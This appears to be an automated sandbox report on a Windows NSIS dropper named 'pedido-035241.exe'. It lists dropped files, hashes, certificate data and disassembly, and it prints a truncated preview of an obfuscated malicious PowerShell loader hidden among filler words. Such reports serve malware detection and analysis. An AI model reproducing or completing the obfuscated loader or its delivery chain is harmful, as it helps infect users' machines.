                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jeggcopt.oui.ps1

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v03hu1qk.pvf.ps1

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene\overcutter.txt

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\pedido-035241.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):465
                                                                                                                                                                          Entropy (8bit):4.255544231677184
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:ZR1EOIygKJPTYEO/OAOLkKARrQdNJdKiXkB9MOyFCZ60WgE:9xIyPtYEO/vlK6QUlE
                                                                                                                                                                          MD5:2F8A39C6A08A57605F1965012760D560
                                                                                                                                                                          SHA1:4607DE528A646C0758D7FB322CF9CCFFAFA026B8
                                                                                                                                                                          SHA-256:37909462973046DA9CD15B9FB1CCD7F92D97C26AF08C83A8D486BA411DC69373
                                                                                                                                                                          SHA-512:0B2F239E494FCEE5D18812D98E3571F20B049CAF11CEA675CB55E95283A6E99E7A854DD87087EC5F7C402B7A7C760A1AB4B399EA17319C1F9249465E542E2D8D
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:pachydermateous bomuldsskjorterne redisseisin minimalists.delikatessehandlens standardfilnavn spillerelater,udstafferingers parallelforskydning ynglepladsernes libanons somatotypically inveigler sammenrendets..tyrannierne coeternally kommandrs colliquative gonidic ringetonen issens hyperanabolic unpicturesque..sminker apporterende campaigner gorvarehandlen radiosender bibelskes.logikfamilier neurotransmission pasfotoerne searchment inrighted couphgens toadfish,

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene\pedido-035241.exe

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1093536
                                                                                                                                                                          Entropy (8bit):7.971789372050483
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:ENrNYo6GP6fzfqUC1tkth3VwV5k7j5awX300zQUGtZq:U+S6fziUC1wh3VwXgj5aEkHUGtZq
                                                                                                                                                                          MD5:68AD57514CFB4E1CB4529556DBBC9B73
                                                                                                                                                                          SHA1:3681D090C965CD8AF1C7BFFD6FE5427E997DAA41
                                                                                                                                                                          SHA-256:4B0C3D89A63DC1F177379EA05642C3C3B377ADC560B26C7A41AEBD2ED1AFE9AC
                                                                                                                                                                          SHA-512:F2EF34F8AD5282676BDC3913007D471CC59E1BF20C5371817B3C85A2C24C19983D3C6C2F5E00BB539FC6596A0B02B4A33E59A4391A4165C22E0CBF2EDD103F5A
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L....Oa.................f...*.......4............@.......................................@..........................................@...Y.............. ............................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...................................rsrc....Y...@...Z..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene\pedido-035241.exe:Zone.Identifier

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Flyvevaabnene\tommelskruerne.afs

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\pedido-035241.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2537825
                                                                                                                                                                          Entropy (8bit):0.15731061171505112
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:ZfmQIC91KjqGcnL63MV1HZDQDVlybvFG7dH9Sf12lqM1FBQWEP3dNaRrwPu1Br0O:Rrc
                                                                                                                                                                          MD5:6462B1502F14E3329E79F164F0B8EDA9
                                                                                                                                                                          SHA1:70F60B7634B75DAFA601D70E812D7127F4432AD3
                                                                                                                                                                          SHA-256:50852368EB9E21692315077EB7DD5E833B4430342695CFF4E70FEF7DF59DCFB7
                                                                                                                                                                          SHA-512:979F463C29EFDE5C746CE6A34B72DC064BDB9364702C5DB24B567E823B6992E076BDB160979330EDDDA03F9AE4EEB20FD1E656337A2654E43B3B36673820CF45
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:...............M....................................................................4.......................................................................................................................R.......{......................................................................k............................................................................................................................................................................................................................................................................................................................................................................................................................................................~.............................................................................................................................................................I.................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Kostbare.tes

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\pedido-035241.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5657071
                                                                                                                                                                          Entropy (8bit):0.15928467329934035
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:hia6UGQo5IgoTcs1teRMojkuNW52cfotYssiEfN5RJhDjTeYJNKUGQ0yyiJ+yDKJ:RLLXHTFL
                                                                                                                                                                          MD5:7FD6A7B5493B8D6659842CBDAC26F759
                                                                                                                                                                          SHA1:59ECA4FEF3F72F17B4F87C647836AF1EE0B7B208
                                                                                                                                                                          SHA-256:F38655E8753CF872BBC92F703C0A23F3CB35EFEA183296B92ADF3672A509162C
                                                                                                                                                                          SHA-512:C300E5599EB51D0862F806DF1C6274B0D59F75E41132F85C9E47F777CDD7B2E9B67C06BC033CD1FFE1C87A7EDD6B07D3E9DAD2D280EBAB1E22C7CA6291E881F5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:............................................n..............S.......................................................................................................................................................................q...............................................................................................................................................................................................................................................................................................................................................................................................z.............................................................................................................................................................................................................................4..q...................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Phylogenetically.del

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\pedido-035241.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):108656
                                                                                                                                                                          Entropy (8bit):0.1629399370348107
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:iM4xHhYyQjrwzEa24+rFK3q01Z2FdZe/Gbjd6Ne7GJ:duhYyQjcd++7KFdZKGAw
                                                                                                                                                                          MD5:ABD3958B383B1C9F43AC4E47DD12BEC4
                                                                                                                                                                          SHA1:4248CEAF77E8A46BBFA08FC14BDAB5428D7194F6
                                                                                                                                                                          SHA-256:30E7E92C51752F6CFD747EC30BF29792A819FDA586557B053FF141861BC3EA7B
                                                                                                                                                                          SHA-512:F6FE0761F4E15D9FCCCE230FCDFC77E95A259A014654FF94A600CBA120F222ED2085B6DC3CFEC7F21177137BD5136AC42894E113EAFD1D21659FF3F14316799B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:............................................................................................................................................................................................................._....................................................................................................................................................................................................................................................................................................................................................................................)...........................................................<.......................................................................i.........................................................................................................................................................................................).......................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\Unpursuing.Ecc

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\pedido-035241.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):297493
                                                                                                                                                                          Entropy (8bit):7.66304746887246
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:BNl6bDScMImLLF2H7D50y7+QL0vJ7xnne+c8/ZzAN:W7D50sN0/nneQhAN
                                                                                                                                                                          MD5:AC443ED3BCDA8FD27EAB8E4719631588
                                                                                                                                                                          SHA1:6E501A1D2959A2279C67FF2B635950B72C537DF8
                                                                                                                                                                          SHA-256:050E2941ABCF6621568720F75C7D27B1BC7B57F4A2DB95DD44701AAB68996042
                                                                                                                                                                          SHA-512:F4E6440CECEE0B5C2197E1F77757501B45CFA1FB14389944B3F775E5611ACCF946A1D6625E8758592636F26F05F41AED7309DE4B6CAE22CB1A3B8D18730DF69C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:....JJ..22......$...................L........rrrrr......................\......{{.llll.........1....................................z......V....YY.............(. ...................................'.W..&..........v...;...b.K.....X......^..xxxx..........l...t..............ll........`.........i........<......v.....K................U.......!!!!..AAAA..r.........................''............[..EEE......KKKK......>>>..................}}..k.............GG...........Q...................@@.......uu...........&&..$............++++...............................[[[....x...........'.......@@@..?....,..... ..$$$..........f............+........Q........................T.......-.........J.........vvvv.......W.....@.......x.{..................k....>>.e.@...\\\..............II...L..............<.--.........................++++...FFF...................... .......$.....k.ooooooooooooo.&&&&.,,..................................yy......===............................"""..........,......dd....|.R.

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\backwashed.car

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\pedido-035241.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6429709
                                                                                                                                                                          Entropy (8bit):0.15806775405645646
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:VNOwnrRrLv7/6Ngd/3fk7lv70zCxVdw2J+bxTylmmf13Y2jmVnc+1dHiqkGAr/EA:vGD8vB
                                                                                                                                                                          MD5:F4FF9F83B617854EAA4804F4499C7538
                                                                                                                                                                          SHA1:C93182B840EBDDB4A16EF90F1B0AE26DC1562FBA
                                                                                                                                                                          SHA-256:AFA03D58592E5BE1ADF5E352A40CE899BC707BB40CC6CD1EF5930E6302A94C18
                                                                                                                                                                          SHA-512:2E5C29BD767EEA4939A4B82CD7DD6EC323255D9046D96CE2C1931D617D125AB96ABC1F4B5444097A3A8085356FB7BD894A5C9769710B67823228BD1C371CF756
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:...............................................................................................................................................................................................................................................................................................................r.........................................................................................................................................................Q.....................................................................................................................................................................................................................................................................................................................................................................................................................Y........................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\indholdsfortegnelsen.mic

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\pedido-035241.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):7637195
                                                                                                                                                                          Entropy (8bit):0.1584950093042192
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:DASGeKc+zkfELL9UhjwNNoVJ2zV7S9OrvkoAaqV6zoPv2WHiirTgQKUIZsrj6ZzL:gXK+k
                                                                                                                                                                          MD5:EB71C6BE6D08F8A7C7C9DA1335DF04C1
                                                                                                                                                                          SHA1:7B57A40E3F6C44178A25EF465C3E7F5EA3184335
                                                                                                                                                                          SHA-256:D1D5BFF683EDC3A076382FCFE8C8A28EA1FF6A1C7731A80BAB8FFF0E82A54D07
                                                                                                                                                                          SHA-512:5ED43E9E6A66F981DEEC765A13A361BCCEFE4E1A38C6847F9DB00F2ED1BF50497E36B6D5398190FB2CB0B191E4DA33A77C7378CDB446169941C84776D7406A48
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:...................[.....................................................................................................................................................................................................................uV.......................................................................................................................>......................................................................................................................................................................................................................................................................................................................................................................................................`..............................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\pedido-035241.exe
                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (4255), with CRLF, LF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):71316
                                                                                                                                                                          Entropy (8bit):5.170339565453029
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:5AWJySdBBOLUqUdlpBo5ZbTOAVAvF17f1XqkWU7UqmBEZELVunMzinv:Rp7eUMaAVAvFZf1XAU7UaEpMv
                                                                                                                                                                          MD5:5C166AC0DF5B33D27A3157FF3484B1D8
                                                                                                                                                                          SHA1:14F38AE3F4ED43AB6F47CAD5859E4494408092C5
                                                                                                                                                                          SHA-256:C1203A1FC75A7592B8916F61C403CA3EEBED1B1D84CD3C7EAA89187EE665229C
                                                                                                                                                                          SHA-512:89A6E8A42AC4FC4B8618C3E79300126E49128C238E91F557A573EDD7905A8FB35CB601E422B0A55EE74CCBB274E228314CF27741E8B3B70B532D3980328E89B1
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:$Solenoconch=$Netop;........$Rectectomy = @'.Langema.An.erod$pindsviVDeodoriaovariorrPresentmRifle beIrretenlVentri e LagerpdFreitysnCalisthiFlippe nB rrichgPseudo,sHoopoeplKajanlgiNedsablgkortk inS mvrspiBambusmnBuntinggHeltall=Tvangsf$Agter,aFResociaj ystemae llopatrDak ylenfluepapsamaurostVrdighey rigssiropblandemetasomrCo.vent;Differe.SrboetsfReumatou NapolenPituitocDouch.ntEn elopiOpsigelotarmrennTilfrsl Ery.hrohNon.mmujBritishsSupermadCentrumeKulturhrCep,alonStipuleeInflexisPrfikse udgrun(Tenderi$Dagl jeNExpansioTraumatn Blomstc GeigycoCatechinLabo isc.ndictoeceram aiHelbredvStr.wbeiTermi snSidst mg Puerpe,Postula$KastellFStedtiloBrndemrd Pl devgMokkenseConject)Erhverv Nemathe{Afhngig.Heltids.Sla eti$MesozoiTNotwithehyrend rmetapodnBaa.izes AnstodtAberratr Vidne ob,nepase BrugsamD gspriiGeleemsaFjo retcAcappeleTailmyoaPlejehjeChilod 2ma karb8L gnivo Agronom(ForklarSFor bsru ApsidebAdmira mUnde nno ubcheldGlycerouPolymiglDybeneseOboerne Hi,rark'EyehookS,toleafwAmarylliTandenddGr

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nso7E83.tmp\nsExec.dll

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\pedido-035241.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):7168
                                                                                                                                                                          Entropy (8bit):5.298362543684714
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                                                                                                                                                                          MD5:675C4948E1EFC929EDCABFE67148EDDD
                                                                                                                                                                          SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                                                                                                                                                                          SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                                                                                                                                                                          SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: uu8v4UUzTU.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: uu8v4UUzTU.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: , Detection: malicious, Browse
                                                                                                                                                                          • Filename: , Detection: malicious, Browse
                                                                                                                                                                          • Filename: SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: SecuriteInfo.com.W32.PossibleThreat.20282.14864.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: GrammarlyInstaller.evxSw76fmxki94ued2mj0c82.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: , Detection: malicious, Browse
                                                                                                                                                                          • Filename: GrammarlyInstaller.cl87tH2fwify908jh75b0ag2.exe, Detection: malicious, Browse
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          Static File Info

                                                                                                                                                                          General

                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                          Entropy (8bit):7.971789372050483
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:pedido-035241.exe
                                                                                                                                                                          File size:1'093'536 bytes
                                                                                                                                                                          MD5:68ad57514cfb4e1cb4529556dbbc9b73
                                                                                                                                                                          SHA1:3681d090c965cd8af1c7bffd6fe5427e997daa41
                                                                                                                                                                          SHA256:4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac
                                                                                                                                                                          SHA512:f2ef34f8ad5282676bdc3913007d471cc59e1bf20c5371817b3c85a2c24c19983d3c6c2f5e00bb539fc6596a0b02b4a33e59a4391a4165c22e0cbf2edd103f5a
                                                                                                                                                                          SSDEEP:24576:ENrNYo6GP6fzfqUC1tkth3VwV5k7j5awX300zQUGtZq:U+S6fziUC1wh3VwXgj5aEkHUGtZq
                                                                                                                                                                          TLSH:C0352305A2F2D873E1A64F77E53664F102ED6D22C131573F0312BF59BEB6262682D322
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....

                                                                                                                                                                          File Icon

                                                                                                                                                                          Icon Hash:4e33695d030a3f39

                                                                                                                                                                          Static PE Info

                                                                                                                                                                          General

                                                                                                                                                                          Entrypoint:0x4034f7
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:4
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                                                                                                                                                                          Authenticode Signature

                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                          Signature Issuer:CN=stivskrt, E=Oatenmeal@Proctorizes.Shr, O=stivskrt, L=Ruddington, OU="Welshed Imaginativeness ", S=England, C=GB
                                                                                                                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                                          Error Number:-2146762487
                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                          • 17/06/2024 06:02:33 17/06/2025 06:02:33
                                                                                                                                                                          Subject Chain
                                                                                                                                                                          • CN=stivskrt, E=Oatenmeal@Proctorizes.Shr, O=stivskrt, L=Ruddington, OU="Welshed Imaginativeness ", S=England, C=GB
                                                                                                                                                                          Version:3
                                                                                                                                                                          Thumbprint MD5:1686CA22A771496CECDFB312C0D27C52
                                                                                                                                                                          Thumbprint SHA-1:E21A3845E81F6C435D6F565C89412C3DF95099FF
                                                                                                                                                                          Thumbprint SHA-256:D98B842E22A158CE3E857D75245136394E465213FA5EB6BC37BD421E8B04313F
                                                                                                                                                                          Serial:2C6F4DE977A317E40EE4F92F6507FAC9DCA57440

                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                          Instruction
                                                                                                                                                                          push ebp
                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                          sub esp, 000003F4h
                                                                                                                                                                          push ebx
                                                                                                                                                                          push esi
                                                                                                                                                                          push edi
                                                                                                                                                                          push 00000020h
                                                                                                                                                                          pop edi
                                                                                                                                                                          xor ebx, ebx
                                                                                                                                                                          push 00008001h
                                                                                                                                                                          mov dword ptr [ebp-14h], ebx
                                                                                                                                                                          mov dword ptr [ebp-04h], 0040A2E0h
                                                                                                                                                                          mov dword ptr [ebp-10h], ebx
                                                                                                                                                                          call dword ptr [004080CCh]
                                                                                                                                                                          mov esi, dword ptr [004080D0h]
                                                                                                                                                                          lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                          push eax
                                                                                                                                                                          mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                                                                          mov dword ptr [ebp-2Ch], ebx
                                                                                                                                                                          mov dword ptr [ebp-28h], ebx
                                                                                                                                                                          mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                                                                          call esi
                                                                                                                                                                          test eax, eax
                                                                                                                                                                          jne 00007FD85CF54B9Ah
                                                                                                                                                                          lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                          mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                                                                          push eax
                                                                                                                                                                          call esi
                                                                                                                                                                          mov ax, word ptr [ebp-0000012Ch]
                                                                                                                                                                          mov ecx, dword ptr [ebp-00000112h]
                                                                                                                                                                          sub ax, 00000053h
                                                                                                                                                                          add ecx, FFFFFFD0h
                                                                                                                                                                          neg ax
                                                                                                                                                                          sbb eax, eax
                                                                                                                                                                          mov byte ptr [ebp-26h], 00000004h
                                                                                                                                                                          not eax
                                                                                                                                                                          and eax, ecx
                                                                                                                                                                          mov word ptr [ebp-2Ch], ax
                                                                                                                                                                          cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                                                                          jnc 00007FD85CF54B6Ah
                                                                                                                                                                          and word ptr [ebp-00000132h], 0000h
                                                                                                                                                                          mov eax, dword ptr [ebp-00000134h]
                                                                                                                                                                          movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                                                                          mov dword ptr [0042A2D8h], eax
                                                                                                                                                                          xor eax, eax
                                                                                                                                                                          mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                                                                          movzx eax, ax
                                                                                                                                                                          or eax, ecx
                                                                                                                                                                          xor ecx, ecx
                                                                                                                                                                          mov ch, byte ptr [ebp-2Ch]
                                                                                                                                                                          movzx ecx, cx
                                                                                                                                                                          shl eax, 10h
                                                                                                                                                                          or eax, ecx

                                                                                                                                                                          Rich Headers

                                                                                                                                                                          Programming Language:
                                                                                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                          Data Directories

                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x159b8.rsrc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x10a8800x720
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                          Sections

                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                          .text0x10000x65150x660026e66bea3b62728a217ae7bf343ebc1aFalse0.6615349264705882data6.439707948554623IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .rdata0x80000x139a0x1400691f0273dad50ec603f6fedf850b58eeFalse0.45data5.145774564074664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .data0xa0000x203380x6004b75405561a3fcc45b8fe27a6808f3b5False0.4993489583333333data4.013698650446401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .ndata0x2b0000x290000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
